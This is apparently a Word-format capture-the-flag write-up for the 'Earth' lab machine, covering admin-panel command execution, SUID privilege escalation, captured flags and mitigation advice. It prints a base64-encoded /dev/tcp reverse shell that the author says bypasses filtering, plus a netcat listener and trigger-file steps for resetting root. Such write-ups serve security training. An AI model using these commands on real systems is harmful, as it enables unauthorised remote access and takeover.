    <w:p w14:paraId="781A0ADF" w14:textId="73CC4719" w:rsidR="006F1C14" w:rsidRPr="00B93C2F" w:rsidRDefault="006F1C14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7ED06DCA" wp14:editId="3D6F4327">
            <wp:extent cx="5731510" cy="1086485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1095992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924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E720" w14:textId="0B9CC38E" w:rsidR="00B93C2F" w:rsidRP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5DB0BF11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Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609EE689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Admin panel provided a </w:t>
      </w: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CLI command execution tool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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFEFD2C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allowed execution of system commands directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33434DF0" w14:textId="439C3B8F" w:rsid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BA5A747" wp14:editId="0F47B8BC">
            <wp:extent cx="5731510" cy="1430020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="185667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79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3605" w14:textId="11583C79" w:rsidR="006F1C14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01149FCA" wp14:editId="7E6D3C93">
            <wp:extent cx="5731510" cy="1304290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="176170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7094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95D7" w14:textId="25368912" w:rsidR="00B93C2F" w:rsidRDefault="0070053C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8353056" wp14:editId="7A986C99">
            <wp:extent cx="5731510" cy="1474470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="184755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581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C0DD" w14:textId="77777777" w:rsidR="006F1C14" w:rsidRPr="00B93C2F" w:rsidRDefault="006F1C14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FC03F14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Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D40EAA3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User Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E76392C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cat /var/earth_web/user_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687C0B2C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User Flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C58E0B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user_flag_3353b67d6437f07ba7d34afd7d2fc27d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE72DE4" w14:textId="5A331CEE" w:rsid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A3930E8" w14:textId="398626DD" w:rsidR="0070053C" w:rsidRPr="00B93C2F" w:rsidRDefault="0070053C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6A8DBD6E" wp14:editId="7BADD932">
            <wp:extent cx="5731510" cy="1286510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="169925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512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ABB6" w14:textId="77777777" w:rsidR="0070053C" w:rsidRDefault="0070053C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54ADB4A8" w14:textId="77777777" w:rsidR="0070053C" w:rsidRDefault="0070053C" w:rsidP="007005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5775A12D" w14:textId="57723D7C" w:rsidR="0070053C" w:rsidRPr="00B93C2F" w:rsidRDefault="0070053C" w:rsidP="007005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Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B52F1C" w14:textId="77777777" w:rsidR="0070053C" w:rsidRPr="00B93C2F" w:rsidRDefault="0070053C" w:rsidP="007005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Encoded payload used to bypass filtering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDD375C" w14:textId="77777777" w:rsidR="0070053C" w:rsidRPr="00B93C2F" w:rsidRDefault="0070053C" w:rsidP="00700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echo "c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjIwLjEwLjMvNDQ0NCAwPiYxCg==" | base64 -d | bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A1BDBB" w14:textId="77777777" w:rsidR="0070053C" w:rsidRPr="00B93C2F" w:rsidRDefault="0070053C" w:rsidP="007005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Listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF88BC5" w14:textId="77777777" w:rsidR="0070053C" w:rsidRPr="00B93C2F" w:rsidRDefault="0070053C" w:rsidP="00700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nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7916E06D" w14:textId="77777777" w:rsidR="0070053C" w:rsidRPr="00B93C2F" w:rsidRDefault="0070053C" w:rsidP="007005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Access gained as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DACA9F5" w14:textId="414CB1B7" w:rsidR="0070053C" w:rsidRDefault="0070053C" w:rsidP="00700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A</w:t>
      </w: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pache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263F3B1F" w14:textId="77777777" w:rsidR="0070053C" w:rsidRDefault="0070053C" w:rsidP="00700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</w:p>
    <w:p w14:paraId="683E88B9" w14:textId="7924950E" w:rsidR="0070053C" w:rsidRDefault="0070053C" w:rsidP="00700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0B774382" wp14:editId="05002BFF">
            <wp:extent cx="5731510" cy="3410585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="542649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499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52FA" w14:textId="77777777" w:rsidR="0070053C" w:rsidRDefault="0070053C" w:rsidP="00700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</w:p>
    <w:p w14:paraId="2AEE0913" w14:textId="451A5119" w:rsidR="0070053C" w:rsidRDefault="0070053C" w:rsidP="00700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1DA60D0B" wp14:editId="6A4126D9">
            <wp:extent cx="5731510" cy="1355090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="103485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560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26128" w14:textId="41BA49E4" w:rsidR="0070053C" w:rsidRPr="00B93C2F" w:rsidRDefault="0070053C" w:rsidP="00700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22B17C08" wp14:editId="5D483E71">
            <wp:extent cx="5731510" cy="489585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="263457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570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C1B9C" w14:textId="77777777" w:rsidR="0070053C" w:rsidRDefault="0070053C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275059F2" w14:textId="2FE7057D" w:rsidR="0070053C" w:rsidRDefault="0070053C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4CCA5B29" wp14:editId="228D5D89">
            <wp:extent cx="5731510" cy="2301240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="137929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963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3AE8" w14:textId="0F2C088A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Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5876CC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Step 1 — </w:t>
      </w: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SUID Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD269DE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find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263460DC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Interesting binary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4274B163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/usr/bin/reset_root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C5F829" w14:textId="75E9B578" w:rsid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42E84C64" w14:textId="2279B2A9" w:rsidR="0070053C" w:rsidRPr="00B93C2F" w:rsidRDefault="0070053C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1C7C10E" wp14:editId="574610C0">
            <wp:extent cx="4971429" cy="3476190"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="54686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698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71429" cy="3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F2B7C" w14:textId="77777777" w:rsidR="0070053C" w:rsidRDefault="0070053C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</w:p>
    <w:p w14:paraId="66F35B67" w14:textId="77777777" w:rsidR="0070053C" w:rsidRDefault="0070053C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</w:p>
    <w:p w14:paraId="72CE0486" w14:textId="5D642BDB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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="007005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>2</w:t>
      </w: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— </w:t>
      </w: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Binary Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64907B65" w14:textId="3FE9A542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Extracted binary and </w:t>
      </w:r>
      <w:r w:rsidR="00301109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analysed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using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DAAF21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strings reset_root</w:t>
      </w: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br/>
        <w:t>strace ./reset_root</w:t>
      </w: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br/>
        <w:t>ltrace ./reset_root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D4BE0" w14:textId="21E3A2B9" w:rsid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11512A25" w14:textId="37286C43" w:rsidR="0070053C" w:rsidRDefault="0070053C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24CE2234" wp14:editId="1302F2E5">
            <wp:extent cx="4371429" cy="1314286"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="17792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58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71429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76AF2" w14:textId="77777777" w:rsidR="0070053C" w:rsidRDefault="0070053C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9BA2EE1" w14:textId="4376DE7B" w:rsidR="0070053C" w:rsidRDefault="0070053C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4241FA96" wp14:editId="60BFF179">
            <wp:extent cx="5731510" cy="3496310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="851514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5140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63DD1" w14:textId="77777777" w:rsidR="0070053C" w:rsidRDefault="0070053C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66801D7B" w14:textId="77777777" w:rsidR="0070053C" w:rsidRPr="00B93C2F" w:rsidRDefault="0070053C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ED47D68" w14:textId="27BEA051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Step </w:t>
      </w:r>
      <w:r w:rsidR="007005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>3</w:t>
      </w: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— </w:t>
      </w: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Trigger Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DBDEFD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From</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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strace</w:t>
      </w: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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26067DE8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/dev/shm/kHgTFI5G</w:t>
      </w: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br/>
        <w:t>/dev/shm/Zw7bV9U5</w:t>
      </w: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br/>
        <w:t>/tmp/kcM0Wewe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6218F9A2" w14:textId="34E65CDD" w:rsid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4A5216F" w14:textId="0660ACFD" w:rsidR="00301109" w:rsidRDefault="00301109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45D90A40" wp14:editId="5B4361BE">
            <wp:extent cx="5731510" cy="4267200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="126497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768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BDB6" w14:textId="77777777" w:rsidR="00301109" w:rsidRDefault="00301109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42C2ED50" w14:textId="667B507C" w:rsidR="00301109" w:rsidRPr="00B93C2F" w:rsidRDefault="00301109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23CB8003" wp14:editId="0B21628A">
            <wp:extent cx="5731510" cy="1045210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="37114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479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D9936" w14:textId="7629120A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Step </w:t>
      </w:r>
      <w:r w:rsidR="007005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>4</w:t>
      </w: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— </w:t>
      </w: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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375B92E5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Created required trigger files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBC1C6E" w14:textId="499906E3" w:rsidR="00301109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touch /dev/shm/kHgTFI5G</w:t>
      </w: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br/>
        <w:t>touch /dev/shm/Zw7bV9U5</w:t>
      </w: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br/>
        <w:t>touch /tmp/kcM0Wewe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEC0974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Executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C33AF6F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reset_root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DE1EBF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Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654E7507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RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC8043" w14:textId="048552F8" w:rsid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6C7C52DB" w14:textId="5F945B07" w:rsidR="00301109" w:rsidRDefault="00301109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974FDEC" wp14:editId="783E3387">
            <wp:extent cx="4800000" cy="2923809"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="122183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8393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29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8840" w14:textId="77777777" w:rsidR="00301109" w:rsidRDefault="00301109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930FCFB" w14:textId="6A7F784C" w:rsidR="00301109" w:rsidRPr="00B93C2F" w:rsidRDefault="00301109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736DF1D" wp14:editId="4F1A3DC4">
            <wp:extent cx="4961905" cy="1838095"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="205317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720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4156" w14:textId="1D724174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Step </w:t>
      </w:r>
      <w:r w:rsidR="007005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>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C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— </w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C2F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Root Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C346685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su root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614DD3D5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Password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C47237" w14:textId="77777777" w:rsid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Earth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24497B80" w14:textId="77777777" w:rsidR="00301109" w:rsidRPr="00B93C2F" w:rsidRDefault="00301109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</w:p>
    <w:p w14:paraId="685E67AB" w14:textId="1280739F" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00301109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64E0440C" wp14:editId="0A9F5D6D">
            <wp:extent cx="5457143" cy="1342857"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="212644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4427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57143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9EC2" w14:textId="77777777" w:rsidR="00301109" w:rsidRDefault="00301109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6032B8D5" w14:textId="77777777" w:rsidR="00301109" w:rsidRDefault="00301109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08BBF41A" w14:textId="5E7C4367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Root Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D903FEB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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F0F63C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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642329CC" w14:textId="4377E34B" w:rsidR="00B93C2F" w:rsidRDefault="00301109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R</w:t>
      </w:r>
      <w:r w:rsidR="00B93C2F"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oot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F486AB" w14:textId="77777777" w:rsidR="00301109" w:rsidRPr="00B93C2F" w:rsidRDefault="00301109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</w:p>
    <w:p w14:paraId="34075452" w14:textId="501C7D04" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00301109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6FF4D3FA" wp14:editId="02C49BD6">
            <wp:extent cx="5731510" cy="4572000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2012287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879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92935" w14:textId="77777777" w:rsidR="00301109" w:rsidRDefault="00301109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6D48F4EF" w14:textId="77777777" w:rsidR="00301109" w:rsidRDefault="00301109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183AA622" w14:textId="3E30B2D2" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C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Root Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D041FC0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:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cat /root/root_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4242C179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Root Flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160505B1" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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</w:pPr>
      <w:r w:rsidRPr="00B93C2F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>root_flag_b0da9554d29db2117b02aa8b66ec492e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B81CC2" w14:textId="361D71CB" w:rsid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51FF2B0" w14:textId="25AE1B76" w:rsidR="00301109" w:rsidRPr="00301109" w:rsidRDefault="00301109" w:rsidP="0030110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31578C69" wp14:editId="07AD49C7">
            <wp:extent cx="5731510" cy="5655310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="15195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88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26EE" w14:textId="5C1F3ACF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Flags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5042"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="071514BA" w14:textId="77777777" w:rsidTr="00B93C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C633E0" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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Flag Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CC11A27" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="228E9647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8CCC8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User Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0864EAC1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color w:val="5B9BD5" w:themeColor="accent5"/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>user_flag_3353b67d6437f07ba7d34afd7d2fc27d</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="42A60CEF" w14:textId="77777777" w:rsidTr="00B93C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7E30E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Root Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C3E71F1" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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93C2F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>root_flag_b0da9554d29db2117b02aa8b66ec492e</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1162FAEE" w14:textId="42C8E4AF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Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4128BF" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00301109" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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301109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Weak XOR encryption implementation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C4E846" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00301109" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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301109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Exposure of sensitive developer notes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080FAAD0" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00301109" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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301109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Credential leakage </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1897D2" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00301109" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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301109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Insecure admin command execution panel (RCE) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36853E36" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00301109" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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301109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Improper input filtering bypass </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B07F2D" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00301109" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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301109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Misconfigured SUID binary </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0BA7DA" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00301109" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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301109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Lack of validation for trigger conditions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2033537A" w14:textId="6CA74D0D" w:rsidR="00B93C2F" w:rsidRP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6C163DC5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Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4C8F3A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An attacker can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101F63D6" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Break encryption and recover credentials </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F45D253" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Gain admin access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A27BDD" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Execute arbitrary commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7876B296" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Obtain reverse shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAE1482" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Escalate privileges to root </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D55AE59" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Fully compromise the system </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0E4E32" w14:textId="6943EBFF" w:rsidR="00B93C2F" w:rsidRP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0EDAA10B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Mitigation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7460E468" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Use strong encryption instead of XOR </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44275993" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Do not expose sensitive files (testing notes) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A4368B" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Implement proper authentication and access control </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACD39AE" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Sanitize command execution inputs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2A911E" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Restrict execution capabilities in admin panels </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520DFB9F" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Remove unnecessary SUID binaries </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7AE6CA" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Validate file-based triggers securely </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF4C007" w14:textId="6DC194A3" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C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E77B512" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C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Learning Outcomes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116A3601" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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challenge helped in understanding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A67C43" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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Virtual host enumeration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F9DD26" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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robots.txt exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A5C73C" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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XOR cryptography attacks </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD906C2" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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Credential extraction </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E54900" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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Web-based RCE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2E36AE" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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Reverse shell bypass techniques </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F47518" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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Binary analysis using strings, strace, ltrace </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D0949" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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Privilege escalation via SUID binaries </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149A211F" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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93C2F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Full attack chain execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C2231B" w14:textId="12B4814E" w:rsidR="00B077AB" w:rsidRPr="00DA1C91" w:rsidRDefault="00B077AB" w:rsidP="00B93C2F">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B077AB" w:rsidRPr="00DA1C91" w:rsidSect="008D6BB5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6B345" w14:textId="77777777" w:rsidR="00DC2215" w:rsidRDefault="00DC2215" w:rsidP="006B74F2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="499053BE" w14:textId="77777777" w:rsidR="00DC2215" w:rsidRDefault="00DC2215" w:rsidP="006B74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2E6A0" w14:textId="77777777" w:rsidR="00DC2215" w:rsidRDefault="00DC2215" w:rsidP="006B74F2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="63764315" w14:textId="77777777" w:rsidR="00DC2215" w:rsidRDefault="00DC2215" w:rsidP="006B74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066"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EA6E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53B8A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C56C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F7913"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32B4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D7059"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C742D0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F74C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5DAC2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2792F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C030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6669F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A9E5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812A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17126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7C6860"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DADA9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8E0628"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5A4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ED5048"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E82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36166C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D15C4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65006F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AEAC9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E41E14"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26DA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5A4583"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC74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F24B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="495C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723080"/>
